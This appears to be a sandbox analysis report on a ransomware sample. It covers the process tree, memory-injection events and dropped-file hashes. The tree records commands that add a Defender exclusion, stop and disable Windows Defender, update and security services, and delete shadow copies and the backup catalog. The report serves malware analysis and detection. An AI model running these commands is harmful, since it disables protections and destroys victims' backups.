WMIC.exe Token: SeUndockPrivilege 3436 WMIC.exe Token: SeManageVolumePrivilege 3436 WMIC.exe Token: 33 3436 WMIC.exe Token: 34 3436 WMIC.exe Token: 35 3436 WMIC.exe Token: 36 3436 WMIC.exe Token: SeIncreaseQuotaPrivilege 3436 WMIC.exe Token: SeSecurityPrivilege 3436 WMIC.exe Token: SeTakeOwnershipPrivilege 3436 WMIC.exe Token: SeLoadDriverPrivilege 3436 WMIC.exe Token: SeSystemProfilePrivilege 3436 WMIC.exe Token: SeSystemtimePrivilege 3436 WMIC.exe Token: SeProfSingleProcessPrivilege 3436 WMIC.exe Token: SeIncBasePriorityPrivilege 3436 WMIC.exe Token: SeCreatePagefilePrivilege 3436 WMIC.exe Token: SeBackupPrivilege 3436 WMIC.exe Token: SeRestorePrivilege 3436 WMIC.exe Token: SeShutdownPrivilege 3436 WMIC.exe Token: SeDebugPrivilege 3436 WMIC.exe Token: SeSystemEnvironmentPrivilege 3436 WMIC.exe Token: SeRemoteShutdownPrivilege 3436 WMIC.exe Token: SeUndockPrivilege 3436 WMIC.exe Token: SeManageVolumePrivilege 3436 WMIC.exe Token: 33 3436 WMIC.exe Token: 34 3436 WMIC.exe Token: 35 3436 WMIC.exe Token: 36 3436 WMIC.exe Token: SeDebugPrivilege 4556 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3972 wrote to memory of 2736 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 80 PID 3972 wrote to memory of 2736 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 80 PID 3972 wrote to memory of 2736 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 80 PID 2736 wrote to memory of 3124 2736 AdvancedRun.exe 81 PID 2736 wrote to memory of 3124 2736 AdvancedRun.exe 81 PID 2736 wrote to memory of 3124 2736 AdvancedRun.exe 81 PID 3972 wrote to memory of 2004 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 86 PID 3972 wrote to memory of 2004 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 86 PID 3972 wrote to memory of 2004 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 86 PID 3972 wrote to memory of 320 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 90 PID 3972 wrote to memory of 320 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 90 PID 3972 wrote to memory of 320 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 90 PID 3972 wrote to memory of 320 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 90 PID 3972 wrote to memory of 320 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 90 PID 3972 wrote to memory of 320 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 90 PID 3972 wrote to memory of 320 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 90 PID 3972 wrote to memory of 320 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 90 PID 3972 wrote to memory of 320 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 90 PID 4676 wrote to memory of 5068 4676 svchost.exe 93 PID 4676 wrote to memory of 5068 4676 svchost.exe 93 PID 4676 wrote to memory of 5068 4676 svchost.exe 93 PID 4676 wrote to memory of 5068 4676 svchost.exe 93 PID 4676 wrote to memory of 5068 4676 svchost.exe 93 PID 4676 wrote to memory of 5068 4676 svchost.exe 93 PID 4676 wrote to memory of 5068 4676 svchost.exe 93 PID 320 wrote to memory of 1828 320 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 94 PID 320 wrote to memory of 1828 320 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 94 PID 1828 wrote to memory of 1476 1828 cmd.exe 96 PID 1828 wrote to memory of 1476 1828 cmd.exe 96 PID 5068 wrote to memory of 4192 5068 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 97 PID 5068 wrote to memory of 4192 5068 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 97 PID 5068 wrote to memory of 4192 5068 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 97 PID 4676 wrote to memory of 3440 4676 svchost.exe 99 PID 4676 wrote to memory of 3440 4676 svchost.exe 99 PID 3440 wrote to memory of 4720 3440 cmd.exe 102 PID 3440 wrote to memory of 4720 3440 cmd.exe 102 PID 3440 wrote to memory of 2340 3440 cmd.exe 103 PID 3440 wrote to memory of 2340 3440 cmd.exe 103 PID 3440 wrote to memory of 1260 3440 cmd.exe 104 PID 3440 wrote to memory of 1260 3440 cmd.exe 104 PID 3440 wrote to memory of 612 3440 cmd.exe 105 PID 3440 wrote to memory of 612 3440 cmd.exe 105 PID 3440 wrote to memory of 3620 3440 cmd.exe 106 PID 3440 wrote to memory of 3620 3440 cmd.exe 106 PID 3440 wrote to memory of 3196 3440 cmd.exe 107 PID 3440 wrote to memory of 3196 3440 cmd.exe 107 PID 3440 wrote to memory of 3528 3440 cmd.exe 108 PID 3440 wrote to memory of 3528 3440 cmd.exe 108 PID 3440 wrote to memory of 3936 3440 cmd.exe 110 PID 3440 wrote to memory of 3936 3440 cmd.exe 110 PID 1828 wrote to memory of 2044 1828 cmd.exe 109 PID 1828 wrote to memory of 2044 1828 cmd.exe 109 PID 3440 wrote to memory of 1220 3440 cmd.exe 111 PID 3440 wrote to memory of 1220 3440 cmd.exe 111 PID 3440 wrote to memory of 3192 3440 cmd.exe 113 PID 3440 wrote to memory of 3192 3440 cmd.exe 113 PID 3440 wrote to memory of 2800 3440 cmd.exe 114 PID 3440 wrote to memory of 2800 3440 cmd.exe 114 PID 3440 wrote to memory of 1860 3440 cmd.exe 115 PID 3440 wrote to memory of 1860 3440 cmd.exe 115 PID 3440 wrote to memory of 2752 3440 cmd.exe 116 PID 3440 wrote to memory of 2752 3440 cmd.exe 116 PID 3440 wrote to memory of 728 3440 cmd.exe 118 PID 3440 wrote to memory of 728 3440 cmd.exe 118
Processes
-
C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Windows security bypass
- Checks computer location settings
- Windows security modification
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe" /SpecialRun 4101d8 27363⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3124
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe" n3203⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4192 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat"5⤵
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\system32\sc.exesc stop windefend6⤵
- Launches sc.exe
PID:4720
-
-
C:\Windows\system32\sc.exesc config windefend start= disabled6⤵
- Launches sc.exe
PID:2340
-
-
C:\Windows\system32\sc.exesc stop Sense6⤵
- Launches sc.exe
PID:1260
-
-
C:\Windows\system32\sc.exesc config Sense start= disabled6⤵
- Launches sc.exe
PID:612
-
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:3620
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled6⤵
- Launches sc.exe
PID:3196
-
-
C:\Windows\system32\sc.exesc stop usosvc6⤵
- Launches sc.exe
PID:3528
-
-
C:\Windows\system32\sc.exesc config usosvc start= disabled6⤵
- Launches sc.exe
PID:3936
-
-
C:\Windows\system32\sc.exesc stop WaasMedicSvc6⤵
- Launches sc.exe
PID:1220
-
-
C:\Windows\system32\sc.exesc config WaasMedicSvc start= disabled6⤵
- Launches sc.exe
PID:3192
-
-
C:\Windows\system32\sc.exesc stop SecurityHealthService6⤵
- Launches sc.exe
PID:2800
-
-
C:\Windows\system32\sc.exesc config SecurityHealthService start= disabled6⤵
- Launches sc.exe
PID:1860
-
-
C:\Windows\system32\sc.exesc stop SDRSVC6⤵
- Launches sc.exe
PID:2752
-
-
C:\Windows\system32\sc.exesc config SDRSVC start= disabled6⤵
- Launches sc.exe
PID:728
-
-
C:\Windows\system32\sc.exesc stop wscsvc6⤵
- Launches sc.exe
PID:4200
-
-
C:\Windows\system32\sc.exesc config wscsvc start= disabled6⤵
- Launches sc.exe
PID:3228
-
-
C:\Windows\system32\sc.exesc stop WdiServiceHost6⤵
- Launches sc.exe
PID:3096
-
-
C:\Windows\system32\sc.exesc config WdiServiceHost start= disabled6⤵
- Launches sc.exe
PID:3888
-
-
C:\Windows\system32\sc.exesc stop WdiSystemHost6⤵
- Launches sc.exe
PID:4544
-
-
C:\Windows\system32\sc.exesc config WdiSystemHost start= disabled6⤵
- Launches sc.exe
PID:1016
-
-
C:\Windows\system32\sc.exesc stop InstallService6⤵
- Launches sc.exe
PID:1724
-
-
C:\Windows\system32\sc.exesc config InstallService Start= disabled6⤵
- Launches sc.exe
PID:5048
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"4⤵PID:2736
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:1476
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet4⤵
- Deletes backup catalog
PID:2044
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4108
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:892
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2092
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4668
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe.log
Filesize1KB
MD5c8ba28b4adef1e31506663447c4fb877
SHA1ab07929915ab927500c2fb32757f0512a0fa050e
SHA256589ddf313adbbe748a1d83d08ff4ec49b7cc6d6ca9d756ae38a779efe331add2
SHA5121778691f90f45240ba9460f0eb06c8ab72f845f2b841fdfdeb0da3e8c4e293fb11f40c858369cb7c8f5ea5fe45891b8cf1c968849fc3ce2251f517e0c519906d
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD537a6f16ed97a62d9dc7f77f022caaa70
SHA1c2abfe26b5bb4cb9f74bb4a45d4d5d885490121d
SHA256d4c6fd529ccc40f6bfbb1a6618a497d9108082b62d4900c7c03048c40a4c5a02
SHA51294706518a04d4ff7957a2b6735b40f804ecfee0f51524b7003daf15df03d1816347e91e5681a70efd298d6eff316f7e966e45824af998a0dbe274631323f0e6a
-
Filesize
88KB
MD517fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
Filesize
1KB
MD5e217e139ef30c6b01a891a46abdfdfdb
SHA1b7fcffce07cbdc0408c8156f22ac6ab0a8c742c9
SHA256cb631d734d62dce1742744b81cccd7418c27fa6da089d366378b43c00186598e
SHA512a22208a2537138f0b70087b1f0f10972e2ed2feb3ea8ea2f7bc0f7668a4fc1b807aaa7173d04ff04d415c043e1278357d39c7f539b4037ebbc6926e21863d117
-
Filesize
8KB
MD5b2a5ef7d334bdf866113c6f4f9036aae
SHA1f9027f2827b35840487efd04e818121b5a8541e0
SHA25627426aa52448e564b5b9dff2dbe62037992ada8336a8e36560cee7a94930c45e
SHA5128ed39ed39e03fa6d4e49167e8ca4823e47a221294945c141b241cfd1eb7d20314a15608da3fafc3c258ae2cfc535d3e5925b56caceee87acfb7d4831d267189e
-
C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat.[9C4C1438].[[email protected]].makop
Filesize8KB
MD5263655b1a06d30281358b83adfea8d4e
SHA1e070e79d63fce882d648d1af15c8e4247fc25a0f
SHA256145547d6f2dfed7e74bc8abf7c16b1858a9f1d6a6b78817e56d6fae027c4d15d
SHA512867e39e8c7f9bc8a9395c41db013d4648169239fef42db8e0cffe6df2cd6cb8dfc09b039473ab35ad8ddafcf3364f66dcc9b28c6c1d2a931300b221d30088048
-
Filesize
88KB
MD517fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
Filesize
88KB
MD517fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
Filesize
88KB
MD517fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a